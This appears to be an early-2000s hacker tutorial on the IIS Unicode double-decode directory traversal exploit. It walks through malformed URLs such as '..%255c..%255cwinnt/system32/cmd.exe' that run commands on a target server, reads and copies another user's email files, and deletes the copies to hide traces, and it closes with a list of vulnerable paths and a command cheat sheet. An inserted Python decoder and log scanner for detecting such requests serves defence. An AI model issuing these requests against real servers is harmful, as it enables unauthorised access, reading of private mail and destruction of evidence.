Exploiting IIS unicode Exploit


Unicode extensions are installed by default with Microsoft Internet Information
Server (IIS) versions 4.0 and 5.0. They allow characters that are not used in
the English language to be recognized by the web server. As we know, computers
deal only with numbers: they store letters and other characters by assigning a
number to each one. Unicode provides a unique number for every character and so
forms a single character set across all languages. It is a standard 2-byte or
3-byte character set. The IIS Unicode exploit allows users to run arbitrary
commands on the web server. IIS servers with the Unicode extensions loaded are
vulnerable unless they are running current patches.

When can this exploit be used?

1. A writeable or executable directory is available, allowing attackers to
upload malicious code.
2. A system executable such as cmd.exe is available on the root and does not
have an access control list applied to it.

Now I'll explain in detail how this technique is used to exploit servers.
The attack occurs when an attacker sends a malformed URL to a web server that
looks something like this:
http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

TARGET has a virtual executable directory, e.g. scripts, that is located on the
same drive as the Windows system. The directory listing of C:\ will be
revealed! You must be wondering what these %255c are? Well... go on reading; I
have explained it later in this article.

http://www.somesite.com/../../../../../winnt/repair/sam._
This one is simple to understand; the web server will just look for the file in
the web root directory called "../../../../../winnt/repair/sam._". Each '../'
tells the web server to go up one directory, so five '../'s in a row will make
the web server start at the document root, step up five levels, and look there
for a file called winnt/repair/sam._. The number of '../'s does not matter as
long as there are enough of them to traverse back to the root of the file
system (either c:\ or / on a Unix system).

The IIS Unicode exploit uses the HTTP protocol and malformed URLs to traverse
directories and execute arbitrary commands on vulnerable web servers. It uses a
Unicode representation of the directory delimiter ( / ) to fool IIS. Because
the exploit uses HTTP, it works right from the address bar of a browser.
Because of the non-interactive nature of this exploit, interactive commands
such as ftp and telnet don't work very well. We will see later how it is
possible to run commands interactively using this exploit.

Example of the Unicode exploit using a web browser. Note that the output of the
command dir c:\ is displayed:

Directory of C:\

10/24/2002 01:10p Documents and Settings
10/24/2002 03:45p WinNT
10/25/2002 02:21p Inetpub
10/29/2002 07:05a Program Files
11/01/2002 10:20a temp
11/01/2002 11:55a WebLogs
11/10/2002 01:00p SQL
11/11/2002 09:45a webstats.txt
11/11/2002 11:11a Lucky System
11/12/2002 10:23a WINNT
11/15/2002 09:30a Mail

1 File(s) 3,244,232 Bytes
10 Dir(s) 635,474,212 bytes free

Let's go into details....
Say the IP address of my site www.whothehellknows.com is 202.232.54.20 and it
is running IIS.
To understand the actual attack we will closely examine a sample of the exploit.

http://202.232.54.20/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
We notice that the URL calls something from the /scripts directory on the server
www.whothehellknows.com. For this particular version of the exploit the scripts
directory must exist and the path to the executable cmd.exe must be correct.
The next thing we see is ..%c0%af. The string "%c0%af" is an overlong Unicode
(UTF-8) representation of ' / '. If the server is affected by this Unicode
flaw, the URL will be interpreted as:

http://202.232.54.20/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\
The URL backs out of the web root to the root directory of the server, then
calls winnt\system32\cmd.exe. We are using the command interpreter (cmd.exe) to
execute the command 'dir c:\'. You can also try running other commands like
ping, netstat, traceroute, etc.

[Note: Ahh... have you ever wondered why this exploit occurs? Well, it occurs
because the CGI routine within the web server decodes the address twice. First
the CGI filename is decoded to check whether it is an executable file (e.g.
'.exe' or '.com'). After the filename check, IIS runs another decode pass. If
you haven't got it yet, you will understand it later... just read on :) ]. We
will find that substituting a plain / for the %c0%af results in a '404' error
on the web server. Thus we can say that IIS checks the path before interpreting
the Unicode /.

In the above URL, the "?" after cmd.exe introduces the arguments. In the example
given above:
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
the argument is /c, which means cmd.exe carries out the command specified by the
string and then terminates. There are many other arguments; just run cmd.exe /?
at your DOS prompt. The "+" represents the space between arguments.

/..%255c..%255c decodes to /..\..\; what we are trying to do here is perform
directory traversal.
If you know anything about hexadecimal you will realise that we are sending hex
values to the server, just like %20 means space. So we know now that we need to
send a hex value, and the character we need to send is \ . Looking at a
hexadecimal table you will find that \ is %5c. You might think that we could
use %5c instead of \, but we cannot, because IIS checks for it: it would mean
that someone is trying to perform directory traversal on the server, and IIS
denies the user access. But luckily the path gets decoded twice, so if we send
the hex values of %, 5, and c we should get \ in return. Using the hex table we
find that

% = %25
5 = %35
c = %63
We do not need to send a hex value for every character of %5c; as long as we
finish up with %5c after the first decode we will be fine. Now that we know the
hex values we can put them together to get the %5c as required. Let me give you
some examples so that it's clear to you.

Combinations                  Break down of combinations
------------                  --------------------------
%255c                         %25 = %; 5 = 5; c = c ==> %5c
%%35c                         % = %; %35 = 5; c = c ==> %5c
%%35%63                       % = %; %35 = 5; %63 = c ==> %5c
%25%35%63                     %25 = %; %35 = 5; %63 = c ==> %5c

Thereby '..\' can be represented by '..%255c', '..%%35c', etc. After the first
decoding, '..%255c' is turned into '..%5c', which IIS takes as a legal character
string that passes the security check. But after the second decode pass it is
turned into '..\'. Hmm... now you understand?? I'm sure you know why I'm asking
this :) Hint: decoded twice.

There are *many* vulnerabilities with IIS but I'm going to discuss a few:
http://IP ADDRESS/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP ADDRESS/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP ADDRESS/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP ADDRESS/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP ADDRESS/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP ADDRESS/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP ADDRESS/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP ADDRESS/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
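To make the encoding table and the "decoded twice" explanation concrete from the defender's side, here is an added Python example (not code from this page, and not how IIS itself is implemented). It decodes a request path one %XX pass at a time, accepts the overlong C0 AF form of '/' in the lax way the article describes, and reports at which decoding stage the path turns into '..\' or '../'. It then runs the same check over a few constructed IIS-style log lines, so that request patterns like the ones listed above can be picked out of access logs whichever encoding variant was used. The decoders, the traversal regex, and the log lines are all assumptions of this example.

```python
import re
import string

# Added example (not IIS code): decode a request path one %XX pass at a time and
# report the stage at which a directory-traversal sequence appears.

HEX_DIGITS = frozenset(string.hexdigits.encode())
TRAVERSAL = re.compile(r"\.\.[\\/]")  # '..\' or '../' after decoding


def percent_decode_once(data: bytes) -> bytes:
    """One pass of %XX decoding; malformed escapes are copied through unchanged."""
    out = bytearray()
    i = 0
    while i < len(data):
        pair = data[i + 1:i + 3]
        if data[i] == 0x25 and len(pair) == 2 and all(c in HEX_DIGITS for c in pair):
            out.append(int(pair, 16))  # e.g. b"25" -> 0x25 -> '%'
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def lenient_utf8_decode(data: bytes) -> str:
    """Decode 1- and 2-byte UTF-8 forms while ACCEPTING overlong lead bytes C0/C1.

    A strict decoder rejects C0 AF; the lax decoding the article describes maps
    it to '/'. Every other byte is passed through as-is (Latin-1 style)."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def two_pass_decode(token: str) -> tuple:
    """(after first decode, after second decode) for one token such as '%255c'."""
    once = percent_decode_once(token.encode("latin-1"))
    twice = percent_decode_once(once)
    return lenient_utf8_decode(once), lenient_utf8_decode(twice)


def traversal_stages(path: str) -> list:
    """Names of the decoding stages at which `path` contains '..\\' or '../'."""
    raw = path.encode("latin-1", "replace")
    once = percent_decode_once(raw)
    twice = percent_decode_once(once)
    views = [
        ("raw", path),
        ("decoded_once", lenient_utf8_decode(once)),
        ("decoded_twice", lenient_utf8_decode(twice)),
    ]
    return [name for name, text in views if TRAVERSAL.search(text)]


# Constructed IIS W3C-style log lines (not real traffic):
# date time c-ip cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
2002-11-11 09:45:12 10.0.0.5 GET /default.asp 200
2002-11-11 09:45:13 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe 200
2002-11-11 09:45:14 10.0.0.5 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe 200
2002-11-11 09:45:15 10.0.0.5 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 404
2002-11-11 09:45:16 10.0.0.7 GET /products/list%20all.asp 200
"""


def scan_log(text: str) -> list:
    """(cs-uri-stem, stages) for every logged request that decodes to a traversal.

    Rejected attempts (e.g. the 404 for the plain %5c form) are reported too:
    a defender wants to see the probing, not only the successful requests."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        stages = traversal_stages(fields[4])
        if stages:
            hits.append((fields[4], stages))
    return hits


if __name__ == "__main__":
    for token in ("%255c", "%%35c", "%%35%63", "%25%35%63"):
        print(f"{token:10} -> {two_pass_decode(token)}")
    for uri, stages in scan_log(SAMPLE_LOG):
        print(uri, "traversal at", ", ".join(stages))
```

Running it shows why a filter that decodes the path only once lets the %255c family through: every token in the table is still the harmless-looking '%5c' after the first pass and only becomes '\' on the second, while the overlong %c0%af form already reads '/' after one pass. A log review therefore has to decode twice (and decode UTF-8 leniently) before matching for traversal, or it will only catch the plain %5c probes that IIS rejected anyway.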

Recall the example I gave you earlier: the output of the command 'dir c:\'
shown in the web browser.
To navigate, just change the link to /system32/cmd.exe?/c+dir+c:\Inetpub to
list the Inetpub directory.
Say there is a mail system at my site and under the Mail directory there are
subdirectories:
username_whothehellknows.com\inbox\
Under the inbox directory there are many .eml files which you want to read.
Let's assume the username is lucky and the eml file is
05215ac98el136b61450dle8b2.eml. So what are we waiting for? Let's read the
mail! (Ohh! I must delete all my gf's email! LOL) What I did was give the full
path to that eml file:
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\Mail\mail_whothehellknows.com\inbox\05215ac98el136b61450dle8b2.eml
The output I got is:

Showing Directory of c:\Mail\mail_whothehellknows.com\inbox\
10/10/2002 07:58a 2,244 05215ac98el136b61450dle8b2.eml
1 File(s) 2,244 bytes
0 Dir(s) 23,234,544,239 bytes free
I even downloaded the eml file using a download manager, then changed it to
.txt, but this didn't help either; I got the same thing. This means you cannot
read these files directly. So what we do is copy the eml file to c:\ of the web
server, named mail.txt. We write it as:

http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\Mail\mail_whothehellknows\inbox\05215ac98el136b61450dle8b2.eml+mail.txt

This also didn't work!! Do you know why? How can you access such a long eml
file name from the command prompt?? First get the DOS 8.3 format. For that,
list \Mail\mail_whothehellknows\inbox\ with /x. Note: /x gives you the file
names in 8.3 format. Again:
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\Mail\mail_whothehellknows\inbox\/x
We get the file name as 05215A~1.EML
Now,
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\Mail\mail_whothehellknows\inbox\05215A~1.EML+mail.txt
We get:

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are:
1 file(s) copied

Voila!!! We got it! We have copied mail.txt to c:\
Now, simply using
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+type+c:\mail.txt
you can see the contents of it :)
Remember to delete the file after reading:
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+c:\mail.txt
You can try out simple commands like this. I hope you got the idea!

The basic commands used with the Unicode exploit are:

- dir : list a directory
- dir /x : list it in DOS (8.3) short-name form
- call : starts an exe
- start : starts an exe
- del : deletes a file
- type : view files
- copy : copies a file
- /c : sends the commands to a shell that terminates upon completion.
- /s : show the results
- /S : do a search
- /h : run a file in hidden mode
- echo : writes the given text (e.g. commands) into a text file.


_______________________________________________________________________
IG (C) 2003 and Foreva
All rights worth a Invisible Ghost
Copy this and we will come for you